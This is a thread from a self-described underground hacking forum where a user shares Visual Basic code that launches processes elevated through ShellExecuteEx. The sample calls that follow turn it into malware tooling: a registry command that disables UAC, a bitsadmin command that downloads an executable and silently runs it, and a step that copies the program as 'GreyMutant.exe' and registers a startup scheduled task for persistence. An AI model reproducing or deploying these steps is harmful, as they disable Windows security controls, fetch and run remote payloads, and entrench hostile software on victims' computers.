HTDark | Underground Hacking Forum and Cybersecurity Community
  • Earn real money by being active: Hello Guest, earn real money by simply being active on the forum — post quality content, get reactions, and help the community. Once you reach the minimum credit amount, you’ll be able to withdraw your balance directly. Learn how it works.

Visual Basic Run any process as admin

Status
Not open for further replies.
M

Maryca

Leech
User
Joined
May 18, 2017
Messages
13
Reputation
0
Reaction score
225
Points
28
Credits
0
‎8 Years of Service‎
87%
Maybe someone needs

[HIDE-THANKS]

Code: 
>Option Explicit

Private Const SEE_MASK_DEFAULT = &H0
Public Enum EShellShowConstants
essSW_HIDE = 0
essSW_SHOWNORMAL = 1
essSW_SHOWMINIMIZED = 2
essSW_MAXIMIZE = 3
essSW_SHOWMAXIMIZED = 3
essSW_SHOWNOACTIVATE = 4
essSW_SHOW = 5
essSW_MINIMIZE = 6
essSW_SHOWMINNOACTIVE = 7
essSW_SHOWNA = 8
essSW_RESTORE = 9
essSW_SHOWDEFAULT = 10
End Enum
Private Type SHELLEXECUTEINFO
cbSize        As Long
fMask         As Long
hwnd          As Long
lpVerb        As String
lpFile        As String
lpParameters  As String
lpDirectory   As String
nShow         As Long
hInstApp      As Long
lpIDList      As Long     'Optional
lpClass       As String   'Optional
hkeyClass     As Long     'Optional
dwHotKey      As Long     'Optional
hIcon         As Long     'Optional
hProcess      As Long     'Optional
End Type
Private Declare Function ShellExecuteEx Lib "C:\Windows\System32\shell32" Alias "ShellExecuteExA" (lpSEI As SHELLEXECUTEINFO) As Long

Private Function ExecuteProcess(ByVal FilePath As String, ByVal hWndOwner As Long, ShellShowType As EShellShowConstants, Optional EXEParameters As String = "", Optional LaunchElevated As Boolean = False) As Boolean
Dim SEI As SHELLEXECUTEINFO
On Error GoTo Err
With SEI
.cbSize = Len(SEI)                  ' Bytes of the structure
.fMask = SEE_MASK_DEFAULT           ' Check MSDN for more info on Mask
.lpFile = FilePath                  ' Program Path
.nShow = ShellShowType              ' How the program will be displayed
.lpDirectory = PathGetFolder(FilePath)
.lpParameters = EXEParameters       ' Each parameter must be separated by space. If the lpFile member specifies a document file, lpParameters should be NULL.
.hwnd = hWndOwner                   ' Owner window handle
If LaunchElevated = True Then       ' And m_OpSys.IsVistaOrGreater = True
.lpVerb = "runas"
Else
.lpVerb = "Open"
End If
End With
ExecuteProcess = ShellExecuteEx(SEI) ' Execute the program, return success or failure
Exit Function
Err:
ExecuteProcess = False
End Function

Private Function PathGetFolder(psPath As String) As String
On Error Resume Next
Dim lPos As Long
lPos = InStrRev(psPath, "\")
PathGetFolder = Left$(psPath, lPos - 1)
End Function
sample:[/HIDE-THANKS]

Code: 
>Call ExecuteProcess("reg", 0, 0, "ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f", True) - uac controller disable (need rreboot)

Dim urlfordownload= As String
urlfordownload= ""
Call ExecuteProcess("cmd", 0, 0, "/k bitsadmin /transfer jobname " & urlfordownload & " %userprofile%\sec.exe&timeout 40&start %userprofile%\sec.exe&Exit 5", False) - download your exe and start (delay 40sec)

Dim UserName As String
Dim Addscript As New FileSystemObject
UserName = Environ$("USERPROFILE") & "\Documents" & "\" & "GreyMutant.exe"
Addscript.CopyFile App.Path & "\" & App.EXEName & ".exe", UserName, 1
Call ExecuteProcess("schtasks", 0, 0, "/Create /SC ONSTART /DELAY 0000:15 /TN TestCrypt /TR %userprofile%\Documents\GreyMutant.exe /F", True) 
'copy file and create task [startup, your exe start with system after every reboot with delay 15 seconds
 
Last edited by a moderator:
Status
Not open for further replies.
Back
Top